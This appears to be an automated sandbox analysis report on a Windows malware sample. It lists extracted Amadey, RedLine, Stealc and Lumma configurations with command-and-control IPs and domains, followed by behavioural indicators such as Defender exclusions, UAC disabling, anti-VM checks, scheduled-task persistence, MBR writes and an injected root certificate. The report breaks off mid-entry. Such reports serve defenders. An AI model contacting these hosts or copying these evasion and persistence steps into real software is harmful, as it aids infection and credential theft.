Analysis
-
max time kernel
93s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29-05-2024 22:54
Static task
static1
Behavioral task
behavioral1
Sample
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe
Resource
win11-20240426-en
General
-
Target
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe
-
Size
1.8MB
-
MD5
e233413f3e354acc52ee4975bb82d590
-
SHA1
40b53bf535aff421917c07e71d2885c67988038d
-
SHA256
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696
-
SHA512
7519fc119212d7c690dd581c681f1688e5483d71d9b97e0e52e8fdbd39826e7c62180666d4d821b91bacbc2c6384c1de9a252cbfaf9f47ad9c129e720e41fa7f
-
SSDEEP
24576:kORgkwKReCjL7SpLkNB564KBnnq7ndUt8CP4tc+OBo+jYayeyC8QBi9DeN/iuJM9:5gkwseUWk0qRUg+jieYQkA4OjvYu2of
Malware Config
Extracted
amadey
4.21
49e482
http://147.45.47.70
-
install_dir
1b29d73536
-
install_file
axplont.exe
-
strings_key
4d31dd1a190d9879c21fac6d87dc0043
-
url_paths
/tr8nomy/index.php
Extracted
redline
1
185.215.113.67:40960
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
lumma
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://detailbaconroollyws.shop/api
https://buttockdecarderwiso.shop/api
https://horsedwollfedrwos.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://employhabragaomlsp.shop/api
https://stalfbaclcalorieeis.shop/api
https://patternapplauderw.shop/api
https://understanndtytonyguw.shop/api
https://civilianurinedtsraov.shop/api
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
5hN4UciOtFCyoPjG18IKIh76.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 5hN4UciOtFCyoPjG18IKIh76.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe family_redline behavioral1/memory/3568-62-0x0000000000BF0000-0x0000000000C42000-memory.dmp family_redline C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe family_redline behavioral1/memory/3020-94-0x0000000000750000-0x00000000007A2000-memory.dmp family_redline -
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
file300un.exe5hN4UciOtFCyoPjG18IKIh76.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 5hN4UciOtFCyoPjG18IKIh76.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeaxplont.exeaxplont.exe5hN4UciOtFCyoPjG18IKIh76.exeaxplont.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5hN4UciOtFCyoPjG18IKIh76.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1600 powershell.exe 1608 powershell.EXE 5536 powershell.exe 1184 powershell.exe 2152 powershell.exe 5272 powershell.exe 4324 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 11 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
5hN4UciOtFCyoPjG18IKIh76.exeaxplont.exeb097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeaxplont.exeaxplont.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5hN4UciOtFCyoPjG18IKIh76.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5hN4UciOtFCyoPjG18IKIh76.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
axplont.exeRegAsm.exeRegAsm.exefile300un.exeInstall.exeb097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation axplont.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation file300un.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe -
Drops startup file 6 IoCs
Processes:
AddInProcess32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BHISb5RkY6zfyhR7E9hPNWHT.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Eurne9qouISPiI1yRx7CSDo3.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m74j6ngsD9uUuToHnEOyF1fN.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AvgqmBCjoPbyKdPBU26d6mSz.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tfy4zWzR737iRvBf4iAJCDWj.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\93RE4MaYjRzBRlerHWqZQS75.bat AddInProcess32.exe -
Executes dropped EXE 19 IoCs
Processes:
axplont.exe33333.exefileosn.exesvhoost.exeOne.exelumma1234.exeaxplont.exegold.exeswizzzz.exefile300un.exegLev4JkALuFVmMKAIsGAWyIf.exe8fdEuUbfYToYKhDcRYPeLZ0N.exebg76dZhV9E7e0SJaoBx5AJjE.exe5hN4UciOtFCyoPjG18IKIh76.exeBozZtwN2ch7zu3w6ykr1G4Nt.exeInstall.exeInstall.exeInstall.exeaxplont.exepid process 3812 axplont.exe 1808 33333.exe 3568 fileosn.exe 3020 svhoost.exe 3068 One.exe 4468 lumma1234.exe 3336 axplont.exe 2984 gold.exe 1748 swizzzz.exe 4976 file300un.exe 5452 gLev4JkALuFVmMKAIsGAWyIf.exe 5564 8fdEuUbfYToYKhDcRYPeLZ0N.exe 5988 bg76dZhV9E7e0SJaoBx5AJjE.exe 6084 5hN4UciOtFCyoPjG18IKIh76.exe 5340 BozZtwN2ch7zu3w6ykr1G4Nt.exe 5464 Install.exe 1552 Install.exe 4236 Install.exe 408 axplont.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeaxplont.exeaxplont.exeaxplont.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine axplont.exe -
Loads dropped DLL 1 IoCs
Processes:
gLev4JkALuFVmMKAIsGAWyIf.exepid process 5452 gLev4JkALuFVmMKAIsGAWyIf.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\5hN4UciOtFCyoPjG18IKIh76.exe themida behavioral1/memory/6084-349-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/6084-368-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/6084-369-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/6084-372-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/6084-371-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/6084-389-0x0000000140000000-0x000000014159C000-memory.dmp themida -
Processes:
file300un.exe5hN4UciOtFCyoPjG18IKIh76.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 5hN4UciOtFCyoPjG18IKIh76.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
file300un.exe5hN4UciOtFCyoPjG18IKIh76.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5hN4UciOtFCyoPjG18IKIh76.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 129 ipinfo.io 132 ipinfo.io 127 api.myip.com 128 api.myip.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
gLev4JkALuFVmMKAIsGAWyIf.exedescription ioc process File opened for modification \??\PhysicalDrive0 gLev4JkALuFVmMKAIsGAWyIf.exe -
Drops file in System32 directory 4 IoCs
Processes:
5hN4UciOtFCyoPjG18IKIh76.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 5hN4UciOtFCyoPjG18IKIh76.exe File opened for modification C:\Windows\System32\GroupPolicy 5hN4UciOtFCyoPjG18IKIh76.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 5hN4UciOtFCyoPjG18IKIh76.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 5hN4UciOtFCyoPjG18IKIh76.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeaxplont.exeaxplont.exe5hN4UciOtFCyoPjG18IKIh76.exeaxplont.exepid process 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe 3812 axplont.exe 3336 axplont.exe 6084 5hN4UciOtFCyoPjG18IKIh76.exe 6084 5hN4UciOtFCyoPjG18IKIh76.exe 408 axplont.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
33333.exelumma1234.exegold.exeswizzzz.exefile300un.exedescription pid process target process PID 1808 set thread context of 2096 1808 33333.exe RegAsm.exe PID 4468 set thread context of 2952 4468 lumma1234.exe RegAsm.exe PID 2984 set thread context of 1916 2984 gold.exe RegAsm.exe PID 1748 set thread context of 4128 1748 swizzzz.exe RegAsm.exe PID 4976 set thread context of 4748 4976 file300un.exe AddInProcess32.exe -
Drops file in Windows directory 2 IoCs
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\axplont.job b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3696 1808 WerFault.exe 33333.exe 5316 2984 WerFault.exe gold.exe 4480 4236 WerFault.exe Install.exe 3576 1552 WerFault.exe Install.exe 2440 5248 WerFault.exe GOqylmQ.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3280 schtasks.exe 1408 schtasks.exe 4636 schtasks.exe 5384 schtasks.exe 3216 schtasks.exe 1032 schtasks.exe 4280 schtasks.exe 2296 schtasks.exe 4376 schtasks.exe 4856 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3196 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeInstall.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936680100006024b221ea3a6910a2dc08002b30309d9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
Processes:
svhoost.exefileosn.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 svhoost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 fileosn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 fileosn.exe Key created 